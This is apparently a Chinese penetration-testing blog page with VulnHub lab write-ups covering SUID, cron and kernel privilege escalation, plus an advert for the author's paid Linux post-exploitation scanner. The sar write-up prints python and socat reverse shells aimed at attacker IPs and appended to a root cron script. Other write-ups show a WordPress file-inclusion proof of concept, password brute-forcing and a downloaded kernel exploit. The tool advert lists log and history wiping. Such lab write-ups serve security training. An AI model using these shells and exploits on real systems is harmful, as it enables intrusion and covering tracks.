首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
8,145 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,201 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,377 阅读
4
几个常见的密码字典推荐
3,452 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
39
篇与
的结果
2025-08-14
Vulnhub-Toppo靶机,python、awk的SUID提权,两种提权方式
vulnhub-Toppo靶机,SUID提权这个靶机主要是suid提权,相对简单,靶机下载:官网链接:https://download.vulnhub.com/toppo/Toppo.zip使用nmap和dirb进行web打点nmap -sS 10.10.10.222 -p- -A -T4dirsearch -u http://10.10.10.222/web识别,是一个普通的html页面whatweb http://10.10.10.222/发现了一个密码信息 12345ted123我们猜测账号就是那串密码夹着中间的英文ted登录成功之后就是内网渗透,我们使用FeatherScan进行内网信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan_v4_5_python -m http.server# 靶机wget 10.10.10.130:8000/FeatherScan_v4_5wget 10.10.10.130:8000/feather_vuln_db.txtchmod +x FeatherScan_v4_5./FeatherScan_v4_5发现提权漏洞得到两个提权向量,两个命令都可以用awk 'BEGIN {system("/bin/sh")}'python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换至此提权成功!很简单吧
2025年08月14日
1,305 阅读
0 评论
0 点赞
2025-08-13
VulnHub-STAPLER: 1 内核&sudo提权
靶机地址:https://www.vulnhub.com/entry/stapler-1,150/靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开,或者导致网络错误我们在端口扫描的时候,就能看到FTP是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务,也就是80端口进行目录扫描curl http://10.10.10.220/.profilecurl http://10.10.10.220/.bashrc使用上面的命令可以看到这些内容(没有什么东西)接下来我们使用FTP匿名登录有一个note笔记,把它get下来查看┌──(root㉿kali)-[~]└─# FTP 10.10.10.220Connected to 10.10.10.220.220-220-|-----------------------------------------------------------------------------------------|220-| Harry, make sure to update the banner when you get a chance to show who has access here |220-|-----------------------------------------------------------------------------------------|220-220Name (10.10.10.220:kali): FTP331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.FTP> ls550 Permission denied.200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 107 Jun 03 2016 note226 Directory send OK.FTP> cd note550 Failed to change directory.FTP> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 107 Jun 03 2016 note226 Directory send OK.FTP> get notelocal: note remote: note200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note (107 bytes).100% |*********************| 107 1.03 MiB/s 00:00 ETA226 Transfer complete.107 bytes received in 00:00 (110.69 KiB/s)FTP> exit221 Goodbye.┌──(root㉿kali)-[~]└─# cat note # 查看noteElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息,我们来到12380端口的web,他报了一个400,使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin,但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息 这样子找找phpmyadmin的nday(利用过几个之后也没什么作用)我们打开目录扫描出来的robobts.txt,包含了两个目录,一个是后台界面的目录,一个是博客地址访问后台,缺弹出了一个框,看这个样子应该是被别人黑过,留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan,枚举可能存在的用户并使用这些用户名对后台进行爆破,使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:footballharry:monkeyscott:cookietim:thumb登录后台第一篇文章第二篇文章,还有第三篇文章,都没有什么用我们访问wordpress插件的目录(dirb,dirsearch都能扫出来)可以看到有三个插件来看第一个插件,他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞,额外找到了突破点我们尝试运行这个exp,报了一些错误,显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令,平时我也不怎么用,-i参数表示的是直接修改这个文件,由于url中包含了很多个/所以就换了个符号|进行分割,不然也可以使用/,s表示替换命令,最后面那个g表示全局替换,使用示例sed -i 's/原内容/新内容/g' # / 写法sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题,ssl错误,我们的靶机站点ssl错误了,不清楚怎么修改代码不要紧,我们使用他提供的poc手工打(这个漏洞脚本中有)下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url,但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址,显示了一个页面不存在的样子随后我找了半天,尝试了各种操作,在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码root : plbkac,原来访问了那个文件包含的poc,在这里会生成几张图片,二这个图片的内容就是你包含的文件的内容!curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库,目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试(同样使用文件包含漏洞,获取/etc/passwd文件内容),下面是可能的用户┌──(root㉿kali)-[/data/demo]└─# cat user.txtsyncpeterRNunemakerETollefsonDSwangerAParnellSHayslettMBassinJBareLSolumMFreiSStroudCCeaserJKanodeCJooJLippsjamieSamDrewjessSHAYTaylormelkaizoeNATHANwwwelly使用这些用户,还有数据库的密码,进行爆破(猜测数据库密码是其中任意一个用户的名字)使用ssh进行登录使用featherscan,进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan/FeatherScan_v4_5_/chmod +x FeatherScan_v4_5./FeatherScan_v4_5发现了如下漏洞信息,如果仔细辨别名称的话,这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞,毕竟工具不能代替人工,随后找到了这个exp最后面有一个exp,我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zipzoe@red:/tmp$ ls39772.zip FeatherScan searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ unzip 39772.zipArchive: 39772.zip creating: 39772/inflating: 39772/.DS_Store creating: __MACOSX/ creating: __MACOSX/39772/inflating: __MACOSX/39772/._.DS_Storeinflating: 39772/crasher.tarinflating: __MACOSX/39772/._crasher.tarinflating: 39772/exploit.tarinflating: __MACOSX/39772/._exploit.tarzoe@red:/tmp$ ls39772 39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ cd 39772zoe@red:/tmp/39772$ lscrasher.tar exploit.tarzoe@red:/tmp/39772$ tar -xvf exploit.tarebpf_mapfd_doubleput_exploit/ebpf_mapfd_doubleput_exploit/hello.cebpf_mapfd_doubleput_exploit/suidhelper.cebpf_mapfd_doubleput_exploit/compile.shebpf_mapfd_doubleput_exploit/doubleput.czoe@red:/tmp/39772$ lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tarzoe@red:/tmp/39772$ cd eebpf_mapfd_doubleput_exploit/ exploit.tarzoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput.c hello.c suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./compile.shdoubleput.c: In function ‘make_setuid’:doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" # 这里报错不要紧,不影响脚本正常编译 ^zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.whoamisuid file detected, launching rootshell...we have root privs now...root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoamiroot至此提权成功!其他思路,在home下面发现了一个sudo用户peter,而且能够使用sudo查看历史命令,发现了另外两个用户的密码,其中包含了peter!能使用sudo!那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhostsshpass -p JZQuyIN5 peter@localhost有了密码,使用sudo的时候发现sudo权限是all,那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你,致敬~往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年08月13日
1,071 阅读
0 评论
0 点赞
2025-07-10
FeatherScan v4.0 - 适用于Linux的全自动内网信息收集工具
前言在平时渗透打靶的时候,经常要自己手工输入命令,做各种基本的信息收集,非常的繁琐,所以自研了一款工具,这款工具没有接入AI,因为不合适,接入了AI的话在一些不能上网的环境下进行信息收集,权限提升的分析,会非常的不方便,这款工具全都在目标机器本地执行(执行速度快,提高渗透测试效率),类似于fscan,需要上传到目标靶机上,后期会增加离线的POC和漏洞库对Linux系统进行全面的信息收集,和特权提升检测,获取方式见文末PS:如果有提权需要可以将这些收集到的信息,全部复制给AI分析就可以了,比如Venice Uncensored另外这个工具采用并行的执行方式,而不是同步执行,这样的话会显著提升脚本的执行速度,不然光一个IP内网扫描,你都够吃一顿肯德基了没有完美的工具,人也是,不可能做到人人都喜欢,不喜欢或者觉得垃圾,勿喷,您完全有使用别的工具的权力,比如开源的LinPEAS、LinEnum、Bashark等等,但都是英文的,有些师傅们可能看不懂,我也看不懂,可能是我没有文化吧,要手动去翻译很麻烦,而我这个是专为国人打造的Linux自动化内网信息收集工具。如果哪里有欠缺或者建议,欢迎师傅们批评和留言。概述FeatherScan是一款专为Linux系统设计的自动化内网渗透与特权提升扫描工具,由泷羽Sec作者白小羽开发。该工具旨在简化渗透测试过程中的内网信息收集和提权检测环节,通过自动化扫描显著减少手工操作时间,帮助安全研究人员高效识别系统弱点。V4.0主要功能1. 全面系统信息收集操作系统与内核信息、用户与组权限分析、环境变量深度检查、网络配置与路由信息、敏感文件权限审计、容器环境检测、服务与进程分析等等简单的内核提权漏洞检测(非常适合用来打靶机学习)2. 内网渗透扫描 主机发现:混合扫描技术(ICMP Ping + ARP分析 + TCP端口扫描),三种网络模式扫描,不忽漏掉每一个内网机器 端口扫描:支持常见服务端口识别 服务识别:自动检测开放服务及版本信息 隐身模式:慢速扫描避免触发IDS/IPS 常见的端口扫描3. 横向移动检测SSH密钥重用检测、密码爆破(SSH, MySQL, PostgreSQL, SMB等)、SMB共享匿名访问检测、数据库服务爆破等等。4. 特权提升检测SUID/SGID危险文件检测、sudo权限深度分析、可写路径检查、内核漏洞匹配(脏牛、脏管道等)、密码哈希分析、自动化漏洞利用(不需要联网)等等5. 安全痕迹管理自动备份/恢复修改文件、安全删除临时文件(7次覆盖)、命令历史清除、日志文件清理、内存缓存清除、本地爆破记录删除技术特点 智能交互式扫描动态启用深度检查、按需开启内网渗透扫描、交互式服务爆破确认等等 混合扫描技术ICMP Ping扫描、ARP缓存分析、TCP端口扫描、服务指纹识别等等 权限提升自动化自动添加特权用户、sudo权限自动化配置、定时任务注入、内核漏洞EXP自动下载等等 安全痕迹管理操作全程跟踪记录、多轮覆盖安全删除、服务专用日志清除等等 使用示例# 基础扫描 chmod +x FeatherScan ./FeatherScan # 启用深度检查+内网扫描 [?] 是否执行深入检查? y [?] 是否执行内网渗透扫描? y [?] 是否启用隐身模式? n输出示例 ███████╗███████╗ █████╗ ████████╗██╗ ██╗███████╗██████╗ ██╔════╝██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔════╝██╔══██╗ █████╗ █████╗ ███████║ ██║ ███████║█████╗ ██████╔╝ ██╔══╝ ██╔══╝ ██╔══██║ ██║ ██╔══██║██╔══╝ ██╔══██╗ ██║ ███████╗██║ ██║ ██║ ██║ ██║███████╗██║ ██║ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ 高级Linux特权提升扫描工具 泷羽Sec安全团队 | 白小羽 | v4.0 =================================================== 工具描述 ================================================= 1、Linux内网信息收集,全面收集操作系统/内核版本、环境变量、用户信息等关键数据 2、检测敏感文件权限、容器环境、服务配置等安全风险点,分析历史命令、环境变量、SSH配置等潜在攻击向量 3、智能主机发现(ARP/Ping/TCP混合扫描),多协议服务爆破(SSH/MySQL/SMB等),网络路由分析、DNS配置检测和代理设置审查 4、SUID/SGID文件扫描与危险程序识别,内核漏洞数据库匹配(脏牛、脏管道等),Sudo规则审计与配置弱点分析 5、Docker逃逸路径检测和容器安全评估,隐身扫描模式(避免触发IDS),自动化痕迹清除机制,敏感信息掩码保护 [-] 系统信息 [+] 当前用户: root [+] 主机名: Kali [+] 操作系统: Kali GNU/Linux Rolling [+] 内核版本: 6.12.25-amd64 [+] 扫描开始时间: Thu Jul 10 05:42:16 AM EDT 2025 [?] 是否执行深入检查? 普通检查: 快速检测常见提权向量 (SUID, 可写文件, 内核漏洞等) 深入检查: 包括普通检查 + 服务爆破 + 敏感文件深度扫描 [y/N] y [+] 深入检查已启用 [?] 是否执行内网渗透扫描? 内网扫描: 主机发现、端口扫描、横向移动检测 [y/N] n ################ 完整系统信息 ################ [-] 系统信息: 主机名: Kali 操作系统: Kali GNU/Linux Rolling 内核版本: 6.12.25-amd64 系统架构: x86_64 运行时间: up 3 days, 22 hours, 52 minutes [-] 用户信息: 当前用户: root 用户ID: uid=0(root) gid=0(root) groups=0(root) 特权用户: root test featheruser 。。。。。。。。。。。。。。。。。。。。。。。使用建议 授权测试:仅在获得明确授权的环境中使用 深度扫描:对关键系统启用深入检查模式 痕迹管理:扫描完成后使用内置清理功能 字典定制:根据目标环境定制pass.txt密码字典 2025.7.28 v4.5继上一篇本次也算是一个大更新1、融入了exploit-db离线Linux内核提权漏洞库,联动searchsploit工具,更方便的简化了渗透测试提权的过程2、融入了GTFOBins常用提权命令共50+个,比如常见的find,sh,pkexec,sudo,nmap,vim,less,tcpdump,Docker,zip,tar等等命令进行提权3、新增了常见的CMS敏感配置文件扫描,比如django,wordpress,joomla等等,通常用来查看数据库的账号密码4、新增敏感环境变量提权模块——PATH提权5、新增相关的免责条款,若不接受,则不能使用该工具下面来看看更新了哪些内容吧,首先是免责条款新增GTFOBins 50+命令提权新增内置GTFOBins提权数据库,无需联网,GTFOBins中的大部分提权方法皆可以利用!!并且满足一定的条件才会输出给你,比如suid,sudo,可读/可写等等,不满足任何一个条件,都不会告诉你利用方法(命令使用准确率还在优化)新增提权总结,以及使用方法,和成功率告知新增CMS常用配置文件检测新增敏感环境变量提权—PATH提权提权效果展示以及path提权,也会将提权方法在程序结束前告知新增exploit-db漏洞库新增Linux内核提权漏洞库(基于searchsploit),这里以tr0ll靶机为例子首先我们需要在Kali中创建自己的漏洞数据库(使用脚本的好处就是这个漏洞库 exploit-db 也就是searchsploit漏洞库是会更新的,使用命令searchsploit -u更新本地漏洞库),执行generate_vuln_db.sh会生成一个漏洞库的txt文件,主要是筛选Linux提权的漏洞将这个txt文件和FeatherScan同时上传到靶机上,使用FeatherScan就会利用内置强大的版本比较算法,进行检测,执行到最后我们得知漏洞编号之后,在Kali中就直接将使用searchsploit -m [编号]复制到当前目录,并使用python开启一个http服务上床到靶机上提权成功!其他细节优化更新了,系统存在bash -p命令提权,但是不出现提权信息问题(因为SUID和SGID同时存在,所以不能使用=4来进行判断)# 靶机 -bash-5.0$ ls /usr/bin/bash -l -rwsr-sr-x 1 root root 1183448 Feb 25 2020 /usr/bin/bash -bash-5.0$ stat -c '%a' "/usr/bin/bash" | cut -c 1 6修改后的执行结果新增手动选择是否尝试进行提权(文件可写的情况下),不然写入会导致一些问题工具获取加入泷羽Sec帮会即可(长期更新中。。。)单独购买不方便获取最新版本,优惠最后两天,错过只能等国庆节了。。。。获取方式加入泷羽Sec内部Freebuf帮会即可获取最新版本,往期版本会不定期在github上进行更新,在帮会主页中找到帮会网盘,即可下载工具啦,这工具没有那么高大上,只是简化了linux内网信息收集,端口扫描,内核漏洞利用,内网探测,痕迹清除等等,理性消费加入方式扫码即可更多福利点击查看https://mp.weixin.qq.com/s/ROMh7U4xj9nXqlKzBFd2WATips:一天存10块,一个月就是3000,一年就是36w,十年就是3600w,3600w可以干什么?上海一套别墅,记得买个带独立机房的,防震防溯源!一个稳定的家庭,给爸妈在老家盖栋最气派的养老别墅,请最好的管家和医护,医护团队人均CISSP+OSEP,至少也是OSCP。一台迈巴赫s680,车窗贴膜要用防弹级的,毕竟可能装满了0day漏洞报告!打工?还打什么工?老板?哪个老板?10年后你自己就是董事长!所以从现在开始养成一个好习惯,只要10年,从此只挖洞不上班,甲方需求全拉黑,开源项目随便PR!看到这里,您觉得这79块钱还贵吗?不过只是您的冰山一角,少买一个吃灰的云服务器,也就您吃的一顿科技料理的外卖,够我吃10顿。从现在开始投资自己吧。10年之后咱们顶峰相见、、、、、、那时候如果您还觉得贵,请开着您的迈巴赫来嘲讽我这个弱智,我将毫无怨言免责声明FeatherScan仅限合法安全审计和授权渗透测试使用。使用者应遵守当地法律法规,未经授权使用本工具造成的任何后果由使用者自行承担。文章首发于:https://longyusec.com/longyushoulu/450/泷羽Sec安全团队 | 白小羽 | 2025往期推荐Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_Docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透一个永久的渗透知识库
2025年07月10日
2,313 阅读
0 评论
0 点赞
2025-07-06
sar靶机,suid计划任务提权
下载地址:https://www.vulnhub.com/entry/sar-1,425/首先是利用arp-scan进行主机发现其次是使用map对其进行端口扫描目录扫描一个cms,并且网站标题中已经泄露了版本信息我们检索cms漏洞将这个exp复制到本地反弹shellexport RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'# 或者socat TCP:10.10.10.1:8888 EXEC:/bin/bash创建交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'然后内网信息收集一堆操作,参考:https://mp.weixin.qq.com/s/B4Lc6gLNU0PuToGjrlngOA看到计划任务中包含了一个root文件每过5分钟执行一次cat /etc/crontabwww-data@sar:/var/www/html$ cat finally.shcat finally.sh#!/bin/sh./write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/shtouch /tmp/gatewaywww-data@sar:/var/www/html$ ls -lls -ltotal 32-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txtdrwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML-rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.shwww-data@sar:/var/www/html$ echo 'export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.sh<fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.shbash: syntax error near unexpected token `('www-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/shtouch /tmp/gatewaywww-data@sar:/var/www/html$ lslsfinally.sh index.html phpinfo.php robots.txt sar2HTML write.shwww-data@sar:/var/www/html$ echo 'socat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.sh<cat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/shtouch /tmp/gatewaysocat TCP:10.10.10.1:8888 EXEC:/bin/bashwww-data@sar:/var/www/html$随后等待5分钟即可,本次靶机主要是利用计划任务提权
2025年07月06日
1,126 阅读
0 评论
0 点赞
2025-07-06
W34KN3SS,通过openssl漏洞公匙获取私匙
下载地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/使用nmap进行端口扫描将这个域名,追加到hosts(本机也要追加C:\Windows\System32\drivers\etc\hosts)这个靶机中是有两个web的,一个web是用ip访问的一个web是用域名访问的,所以也需要注意,仔细观察这个n30可能是一个有用的信息目录扫描出来的一个结果,包含了一个公匙和一个版本文件查看公匙文件这个提示信息,表示的是刚刚那个.pub文件是由openssl 0.9.8c-1生成的使用searchsploit检索漏洞库我们查看第一个txt漏洞描述根据他的描述,我们下载这个文件wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2tar -jxvf 5622.tar.bz2开始对比公匙和密匙,将root@targetcluster前面的东西拿出来进行对比尝试直接登录目录靶机,用户名是什么呢?目前得知的结果就是刚开始找到的那个n30,只能使用这个进行测试了ssh -i rsa/2048/4161de56829de2fe64b9055711f531c1-2537 n30@weakness.jth用最近爆出来CVE-2025-32463试试提权相关的学习文章:https://www.freebuf.com/articles/vuls/437488.htmlgit clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.gitzip -r exp.zip CVE-2025-32463_chwoot本来想要使用最新的提权漏洞的,但是这里没有Docker命令,就利用不了了完整使用方法(仅作介绍)# 2 – build and run Docker image (tagged "sudo-chwoot")$ ./run.sh# 3 – run exploit in container (drops you into a root shell)pwn@0da3726bd81f:~$ ./sudo-chwoot.shwoot!root@0da3726bd81f:/# iduid=0(root) gid=0(root) groups=0(root),1001(pwn)继续信息收集(搜集了一圈也没有什么可以利用的),只有这个code这个可执行文件我们并不知道是什么,执行file命令查看文件类型属于py文件我们找到网上在线pyc反编译工具,放入进行反编译后查看内容(在放入反编译前要先将code文件改成code.pyc文件)https://tool.lu/pyc/得到n30用户的密码dMASDNB!!#B!#!#33至此靶机完成
2025年07月06日
1,448 阅读
0 评论
0 点赞
1
2
3
...
8